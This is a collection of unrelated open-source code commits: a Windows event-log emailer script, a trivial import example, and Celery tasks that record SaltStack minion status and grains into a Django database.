def handle(self, *args, **options):
if options["restore"]:
restore(change=not options['dry_run'])
else:
dump()
| apache-2.0 | Python | |
c56eab117a2cdf652ce816190e69ccb7a0b171f9 | Create EmailEventLog.py | schandok/EmailEventLog | EmailEventLog.py | EmailEventLog.py | '''
This module emails event logs since the last saved time stamp. If no time stamp exists (1st time), last 10 events will be sent.
This module can be attached as a task in Windows Event Viewer to be executed when certain event is logged.
Configure the params below to macth the event that triggered the module, such as logger and severity level (in cmdSinceLastTimeStamp).
All event details will be emailed. E.g: executing below command on command line, will show last 10 messages in System log with Level = Critical, Error or Warning. This would be the eact content of the email.
Test command: wevtutil qe "System" "/q:*[System [(Level<4)]]" /f:text /rd:true /c:10"
'''
import os
import re
import time
import smtplib
import datetime
# Configure params
# In case using gmail for email, create a new App specific password to avoid entering your main password. https://support.google.com/mail/answer/1173270?hl=en
TIMESTAMP_DIR = 'C:\\MC_Logger'
LOGGER = 'System' # Get list of loggers by executing 'wevtutil el' on command line.
SMTP_HOST = 'smtp.gmail.com'
SMTP_PORT = 587
SEND_TO = 'your_email@gmail.com'
USERNAME = 'your_email@gmail.com'
PASSWORD = 'your_passwd'
# Commands to query event log information. cmdSinceLastTimeStamp is querying events AFTER last timestamp and level (1-3) - Critical, Error, and Warning.
# To write a more custom wevtutil query, go to http://technet.microsoft.com/en-us/library/cc732848.aspx
cmdSinceLastTimeStamp = "wevtutil qe \"" + LOGGER + "\" \"/q:*[System [(Level<4) and TimeCreated[@SystemTime>'{0}']]]\" /f:text /rd:true"
cmdLast10 = "wevtutil qe \"" + LOGGER + "\" \"/q:*[System [(Level<4)]]\" /f:text /rd:true /c:10"
class EmailEventLog:
def __init__(self):
self._TIMESTAMP_FILE = TIMESTAMP_DIR + '\\' + 'timeStamp.txt'
def __exit__(self):
pass
def handleEvent(self):
lastEventTimeStamp = self._getLastEventTimeStamp()
cmd = None
# If no timestamp, query last 10.
if None == lastEventTimeStamp:
cmd = cmdLast10
else:
cmd = cmdSinceLastTimeStamp.format(lastEventTimeStamp)
# Get events information from cmd line
evtLog = os.popen(cmd).read()
timeStamp = None
# Find the latest time stamp
for line in evtLog.split("\n"):
if 0 == line.strip().find("Date:"):
timeStamp = line.split(":", 1)[1].strip()
break
# If no timestamp, consider it as a false alarm
if None == timeStamp:
return
# Send email
self._sendEmail(evtLog)
# Save new time stamp
# NOTE: If send mail throws an exception, implying an error in sending email; timestamp won't be updated (intentionally).
self._updateTimeStamp(timeStamp)
def _getLastEventTimeStamp(self):
''' wevtutil expects the time stamp w/ UTC offset. Below logic adds that offset.
'''
try:
timeStamp = open(self._TIMESTAMP_FILE, 'r').read().strip()
# Ensure timestamp is in valid format, e.g: '2014-08-28T22:29:24.000'
if None == re.match('^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}.\d{3}$', timeStamp):
return
timeStamp = timeStamp.split('T')
date = timeStamp[0].split('-')
clock = timeStamp[1].replace('.', ':').split(':')
offset = time.timezone if time.localtime().tm_isdst == 0 else time.altzone
utcTimeStamp = datetime.datetime(int(date[0]), int(date[1]), int(date[2]), int(clock[0]), int(clock[1]), int(clock[2]), int(clock[3])*1000) + datetime.timedelta(0, offset)
return utcTimeStamp.isoformat() if int(clock[3]) == 0 else utcTimeStamp.isoformat()[:-3]
except IOError:
pass
def _updateTimeStamp(self, timeStamp):
open(self._TIMESTAMP_FILE, 'w+').write(timeStamp)
def _sendEmail(self, msg):
smtpServer = smtplib.SMTP(SMTP_HOST, SMTP_PORT)
smtpServer.ehlo()
smtpServer.starttls()
smtpServer.ehlo
smtpServer.login(USERNAME, PASSWORD)
header = 'To: {0}\nFrom: {1}\nSubject: {2} \n\n'.format(SEND_TO, USERNAME, 'Mail from EmailEventLog')
smtpServer.sendmail(USERNAME, SEND_TO, header + msg)
smtpServer.close()
if '__main__' == __name__:
EmailEventLog().handleEvent()
| apache-2.0 | Python | |
9d76f77feebdf20b993385f7022334a4e964e0ad | Create ExampleImport.py | PhoduCoder/HelloWorld | ExampleImport.py | ExampleImport.py | #!/usr/bin/python
print ("This is from the ExampleImport Module")
| apache-2.0 | Python | |
e0a6f86983cb140f9686fe7a9d554707fbd32d52 | 添加celery 的tasks.py | yueyongyue/saltshaker,yueyongyue/saltshaker,yueyongyue/saltshaker | shaker/tasks.py | shaker/tasks.py | from celery import task
from shaker.shaker_core import *
from minions.models import Minions_status
from dashboard.models import *
from returner.models import *
import logging
logger = logging.getLogger('django')
sapi = SaltAPI()
@task()
def dashboard_task():
# minion status data save to mysql
status = sapi.runner_status('status')
key_status = sapi.list_all_key()
up = len(status['up'])
down = len(status['down'])
accepted = len(key_status['minions'])
unaccepted = len(key_status['minions_pre'])
rejected = len(key_status['minions_rejected'])
dashboard_status = Dashboard_status()
try:
Dashboard_status.objects.get(id=1)
except:
dashboard_status.id = 1
dashboard_status.up = up
dashboard_status.down = down
dashboard_status.accepted = accepted
dashboard_status.unaccepted = unaccepted
dashboard_status.rejected = rejected
dashboard_status.save()
Dashboard_status.objects.filter(id=1).update(id=1, up=up, down=down, accepted=accepted, unaccepted=unaccepted, rejected=rejected)
@task()
def grains_task():
# grains data save to mysql
salt_grains = Salt_grains()
minions_status = Minions_status()
status = sapi.runner_status('status')
status_up = status['up']
status_down = status['down']
for host_name in status_up:
grains = sapi.remote_noarg_execution(host_name, 'grains.items')
try:
Salt_grains.objects.get(minion_id=host_name)
except:
salt_grains.grains = grains
salt_grains.minion_id = host_name
salt_grains.save()
Salt_grains.objects.filter(minion_id=host_name).update(grains=grains, minion_id=host_name)
# minion status , version data save to mysql
for host_name in status_up:
salt_grains = Salt_grains.objects.filter(minion_id=host_name)
version = eval(salt_grains[0].grains).get('saltversion').decode('string-escape')
try:
Minions_status.objects.get(minion_id=host_name)
except:
minions_status.minion_id = host_name
minions_status.minion_version = version
minions_status.minion_status = 'Up'
minions_status.save()
Minions_status.objects.filter(minion_id=host_name).update(minion_id=host_name, minion_version=version, minion_status='Up')
for host_name in status_down:
try:
Minions_status.objects.get(minion_id=host_name)
except:
minions_status.minion_id = host_name
minions_status.minion_version = version
minions_status.minion_status = 'Down'
minions_status.save()
Minions_status.objects.filter(minion_id=host_name).update(minion_id=host_name, minion_version=version, minion_status='Down')
'''
@task()
def minions_status_task():
status = Minions_status()
status_all = sapi.runner_status('status')
for host_name in status_all['up']:
salt_grains = Salt_grains.objects.filter(minion_id=host_name)
version = eval(salt_grains[0].grains).get('saltversion').decode('string-escape')
try:
Minions_status.objects.get(minion_id=host_name)
except:
status.minion_id = host_name
status.minion_version = version
status.minion_status = 'Up'
status.save()
Minions_status.objects.filter(minion_id=host_name).update(minion_id=host_name, minion_version=version, minion_status='Up')
for host_name in status_all['down']:
try:
Minions_status.objects.get(minion_id=host_name)
except:
status.minion_id = host_name
status.minion_version = version
status.minion_status = 'Down'
status.save()
Minions_status.objects.filter(minion_id=host_name).update(minion_id=host_name, minion_version=version, minion_status='Down')
'''
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.